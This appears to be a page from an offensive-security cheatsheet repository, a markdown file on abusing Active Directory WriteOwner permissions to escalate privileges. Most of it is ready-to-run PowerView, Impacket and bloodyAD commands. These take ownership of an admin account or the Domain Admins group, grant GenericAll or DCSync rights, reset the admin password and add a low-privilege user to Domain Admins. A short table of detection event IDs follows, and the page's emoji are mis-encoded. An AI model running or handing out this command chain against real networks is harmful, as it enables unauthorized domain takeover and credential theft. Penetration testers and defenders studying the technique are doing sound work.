daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-22-writeowner-abuse.md (5080B)


      1 ---
      2 title: "Attack #22 β€” WriteOwner Abuse"
      3 description: "WriteOwner allows an attacker to change the owner of an AD object to themselves. Since the owner of an object has the implicit right to modify the…"
      4 category: active-directory
      5 subcategory: "ACL Abuse"
      6 tags: ["active-directory", "adcs", "credential-access", "delegation"]
      7 tools: ["Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/🟑 Attack #22 β€” WriteOwner Abuse.md"
     11 ---
     12 # 🟑 Attack #22 β€” WriteOwner Abuse
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 WriteOwner allows an attacker to **change the owner of an AD object** to themselves. Since the owner of an object has the **implicit right to modify the object's DACL** (WriteDACL), this creates a two-step escalation: take ownership β†’ grant yourself GenericAll/WriteDACL β†’ exploit the object. This is a stepping stone attack, commonly found in enterprise environments due to legacy delegation configurations.
     19 
     20 ### Exploitation Chain
     21 
     22 ```
     23 1. Have WriteOwner on a target object
     24 2. Change owner to yourself β†’ Set-DomainObjectOwner
     25 3. Now you have implicit WriteDACL
     26 4. Grant yourself GenericAll β†’ Add-DomainObjectAcl
     27 5. Exploit: reset password / add to group / DCSync / etc.
     28 ```
     29 
     30 ***
     31 
     32 ## βš™οΈ Prerequisites
     33 
     34 | Requirement | Detail |
     35 |---|---|
     36 | **WriteOwner ACE on target** | Your principal has WriteOwner in the target's DACL |
     37 | **Domain user account** | Any authenticated domain user |
     38 
     39 ***
     40 
     41 ## πŸ› οΈ Tools
     42 
     43 | Tool | Platform | Notes |
     44 |---|---|---|
     45 | **PowerView** | Windows | `Set-DomainObjectOwner`, `Add-DomainObjectAcl` |
     46 | **Impacket β€” owneredit.py** | Linux | Change object ownership remotely |
     47 | **Impacket β€” dacledit.py** | Linux | Modify DACL after taking ownership |
     48 | **bloodyAD** | Linux | `set owner` command |
     49 
     50 ***
     51 
     52 ## πŸ’» Full Commands
     53 
     54 ### πŸ”΄ Full Exploitation Chain (Windows)
     55 
     56 ```powershell
     57 # ── Step 1: Take ownership ────────────────────────────────────────────────────
     58 Import-Module .\PowerView.ps1
     59 Set-DomainObjectOwner -Identity targetadmin -OwnerIdentity low_user -Verbose
     60 # Or for a group:
     61 Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity low_user
     62 
     63 # ── Step 2: Grant yourself GenericAll (owner has implicit WriteDACL) ──────────
     64 Add-DomainObjectAcl -TargetIdentity targetadmin -PrincipalIdentity low_user -Rights All
     65 # Or for domain root (DCSync):
     66 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity low_user -Rights DCSync
     67 
     68 # ── Step 3: Exploit ──────────────────────────────────────────────────────────
     69 # Password reset:
     70 Set-DomainUserPassword -Identity targetadmin -AccountPassword (
     71   ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
     72 )
     73 # Or add to group:
     74 Add-DomainGroupMember -Identity "Domain Admins" -Members low_user
     75 ```
     76 
     77 ### πŸ”΄ Full Exploitation Chain (Linux)
     78 
     79 ```bash
     80 # ── Step 1: Take ownership ────────────────────────────────────────────────────
     81 owneredit.py -action write -new-owner low_user -target targetadmin \
     82   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     83 
     84 # ── Step 2: Grant GenericAll ──────────────────────────────────────────────────
     85 dacledit.py -action write -rights FullControl -principal low_user -target targetadmin \
     86   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     87 
     88 # ── Step 3: Exploit ──────────────────────────────────────────────────────────
     89 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     90   set password targetadmin 'P@ssword123!'
     91 
     92 # ── Or bloodyAD shortcut ──────────────────────────────────────────────────────
     93 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     94   set owner targetadmin low_user
     95 ```
     96 
     97 ***
     98 
     99 ## πŸ›‘οΈ Detection β€” Event IDs
    100 
    101 | Event ID | Source | What to Look For |
    102 |---|---|---|
    103 | **4662** | Security Log (DC) | WriteOwner operation on AD object |
    104 | **4670** | Security Log (DC) | Permissions changed on an object |
    105 | **5136** | Security Log (DC) | Owner attribute modified |
    106 
    107 ***
    108 
    109 ## πŸ”— Attack Chain Context
    110 
    111 ```
    112 [WriteOwner] ──→ Take Ownership β†’ WriteDACL β†’ Full Control
    113          β”‚
    114          β”œβ”€β”€β†’ πŸ”‘ Two-step escalation: WriteOwner β†’ WriteDACL β†’ GenericAll
    115          β”œβ”€β”€β†’ πŸ”— Chain with: WriteDACL (#21), GenericAll (#19)
    116          └──→ πŸ’€ Defeated by: ACL auditing, monitor ownership changes
    117 ```
    118 
    119 ***
    120 
    121 > βœ… **Attack #22 β€” WriteOwner Abuse complete.**